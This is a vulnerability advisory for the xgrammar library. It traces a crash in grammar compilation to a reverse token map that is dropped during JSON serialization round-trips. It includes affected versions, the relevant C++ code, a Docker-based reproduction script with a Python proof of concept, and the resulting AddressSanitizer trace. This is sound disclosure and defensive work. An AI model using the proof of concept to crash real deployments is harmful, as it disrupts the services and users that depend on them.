Out-of-Bounds Read After Tokenizer Serialization Round-Trip
Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730
Summary
At assessed main-branch revision f07ca3c, serializing and deserializing an otherwise valid TokenizerInfo silently drops a derived token-ID reverse map. An application only needs to persist or transport a tokenizer through XGrammar's public JSON round-trip and then compile a grammar containing a valid token edge such as Token(0). The compiler indexes the empty map and performs a null-address read. The captured Python AddressSanitizer run and my independent C++ run both terminate at GrammarMatcherForTokenMaskCache::GetTokenEdgeAcceptedIndices in cpp/grammar_compiler.cc. This demonstrates a process-crash/availability primitive, not controlled disclosure or code execution; no malformed tokenizer JSON is required.
Token-level grammar support introduced the reverse map and its compiler consumer in commit 1e09455; v0.1.33 is the first released tag containing that change. I verified the vulnerable constructor/deserializer/sink combination in v0.1.33, v0.1.34, v0.2.0 through v0.2.5, and v0.2.6rc1. v0.1.32 lacks the reverse map and token-edge sink. The v0.2.6rc2 preview tag contains an upstream lifecycle fix that rebuilds the map from BuildTokenCharData(), but assessed main revision f07ca3c is vulnerable because the later main-line integration in 3677d67 again leaves the rebuild only in the ordinary constructor. I found no later released tag to establish a generally fixed main-line release.
Detail
The root cause is a lifecycle mismatch between ordinary construction and reflection-based restoration. token_id_to_sorted_vocab_index_ is not primary tokenizer data. It is a derived lookup table whose slot is a token ID and whose value is that token's position in sorted_decoded_vocab_, or -1 for stop, special, or absent tokens. The normal TokenizerInfo::Impl constructor sorts the ordinary tokens and creates a vocab_size_-element reverse map:
token_id_to_sorted_vocab_index_.assign(vocab_size_, -1);
for (int32_t i = 0; i < static_cast<int32_t>(sorted_decoded_vocab_.size()); ++i) {
token_id_to_sorted_vocab_index_[sorted_decoded_vocab_[i].first] = i;
}
That initialization establishes two invariants used by token-edge compilation: the reverse map has exactly one entry per declared token ID, and every ordinary token ID maps back to a valid sorted-vocabulary position.
Serialization intentionally omits this derived table. The reflection member table in cpp/tokenizer_info_impl.h includes vocab_size_, decoded_vocab_, sorted_decoded_vocab_, trie_subtree_nodes_range_, and the stop/special-token fields, but not token_id_to_sorted_vocab_index_. Omitting derived state is reasonable only if every deserialization path reconstructs it from the restored primary fields.
TokenizerInfo::DeserializeJSON in cpp/tokenizer_info.cc creates an empty Impl through NullObj, then lets AutoDeserializeJSON populate only the reflected members. Because the reverse map is absent from the member table, it remains the default empty vector. The post-deserialization hook rebuilds character counts, but BuildTokenCharData() at the assessed revision does not rebuild the reverse map:
TokenizerInfo tokenizer_info{NullObj()};
if (auto err = AutoDeserializeJSON(&tokenizer_info, json_string, true, "TokenizerInfo")) {
return err.value();
}
tokenizer_info->BuildTokenCharData();
return tokenizer_info;
This explains why the existing serialization tests do not expose the bug. The JSON round-trip is byte-for-byte stable because the missing map is not serialized, property tests compare only public serialized fields, and the functional round-trip test compiles a character grammar rather than a Token(...) or ExcludeToken(...) edge. Character matching uses the restored sorted vocabulary and rebuilt character metadata, so it does not consume the missing lookup table.
The first consumer that distinguishes a constructed tokenizer from a restored one is GrammarMatcherForTokenMaskCache::GetTokenEdgeAcceptedIndices in cpp/grammar_compiler.cc. Compilation of root ::= Token(0) carries the valid token ID 0 into this function. The code obtains the empty reverse map, checks the index only with XGRAMMAR_DCHECK, and then uses unchecked operator[]:
const auto& tid_to_sorted = tokenizer_info_.ImplPtr()->GetTokenIdToSortedVocabIndex();
int32_t tid = info.TokenIds()[i];
XGRAMMAR_DCHECK(tid >= 0 && tid < static_cast<int32_t>(tid_to_sorted.size()));
if (tid_to_sorted[tid] >= 0) {
tmp_token_edge_accepted_.push_back(tid_to_sorted[tid]);
}
For the PoC, tid is valid for the declared three-token vocabulary but the restored vector has size zero. The sanitizer build defines _GLIBCXX_NO_ASSERTIONS, and XGrammar's internal debug check is not an unconditional runtime guard, so neither check prevents tid_to_sorted[0]. std::vector::operator[] then reads through the vector's null data pointer. The same root cause affects ExcludeToken(...), which uses the same map in the adjacent branch.
Reproduce
Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.
The following disposable container pins assessed revision f07ca3cb03affaca98809c4e9dad41deed2f7730, creates a valid tokenizer with XGrammar itself, round-trips it through the public JSON API, and compiles a token-edge grammar. The input does not edit the JSON or supply an out-of-range token ID. The final Python process intentionally aborts under AddressSanitizer; the container is removed afterward.
docker run --rm -i python:3.12-slim-bookworm bash <<'DOCKER'
set -eux
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
python -m pip install -q --index-url https://download.pytorch.org/whl/cpu torch
python -m pip install -q scikit-build-core apache-tvm-ffi pydantic transformers numpy typing-extensions
mkdir work
cd work
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git rev-parse HEAD
git submodule update --init --recursive --depth 1 --quiet
ASAN_OPTIONS=verify_asan_link_order=0:detect_leaks=0 \
CXXFLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
LDFLAGS='-fno-lto -fsanitize=address' \
python -m pip install -q --config-settings=cmake.build-type=Debug --no-build-isolation --no-deps .
cat > ../repro.py <<'PY'
import xgrammar as xgr
tokenizer = xgr.TokenizerInfo(
["a", "b", "<eos>"], xgr.VocabType.RAW, stop_token_ids=[2]
)
tokenizer = xgr.TokenizerInfo.deserialize_json(tokenizer.serialize_json())
xgr.GrammarCompiler(
tokenizer, max_threads=1, cache_enabled=False
).compile_grammar('root ::= Token(0)')
PY
cd ..
report19_asan=$(g++ -print-file-name=libasan.so)
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:handle_segv=2:use_sigaltstack=0:disable_coredump=1 \
LD_PRELOAD="$report19_asan" \
python repro.py
DOCKER
The captured Python run reached the expected compiler sink. Container-specific absolute prefixes and unrelated binding/runtime frames are omitted:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3403==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000
==3403==The signal is caused by a READ memory access.
==3403==Hint: address points to the zero page.
#0 xgrammar::GrammarMatcherForTokenMaskCache::GetTokenEdgeAcceptedIndices() cpp/grammar_compiler.cc:745
#1 xgrammar::GrammarMatcherForTokenMaskCache::GetAdaptiveTokenMask(bool) cpp/grammar_compiler.cc:853
#2 operator() cpp/grammar_compiler.cc:1102
#3 operator() cpp/grammar_compiler.cc:1118
#4 xgrammar::GrammarCompilerSub::MultiThreadCompileGrammar(...) cpp/grammar_compiler.cc:1138
#5 xgrammar::GrammarCompilerSub::CompileGrammar(...) cpp/grammar_compiler.cc:1192
#6 xgrammar::GrammarCompiler::Impl::CompileGrammar(...) cpp/grammar_compiler.cc:1511
#7 xgrammar::GrammarCompiler::CompileGrammar(...) cpp/grammar_compiler.cc:1580
SUMMARY: AddressSanitizer: SEGV cpp/grammar_compiler.cc:745 in xgrammar::GrammarMatcherForTokenMaskCache::GetTokenEdgeAcceptedIndices()
==3403==ABORTING
Credit
Zheng Yu @ Depthfirst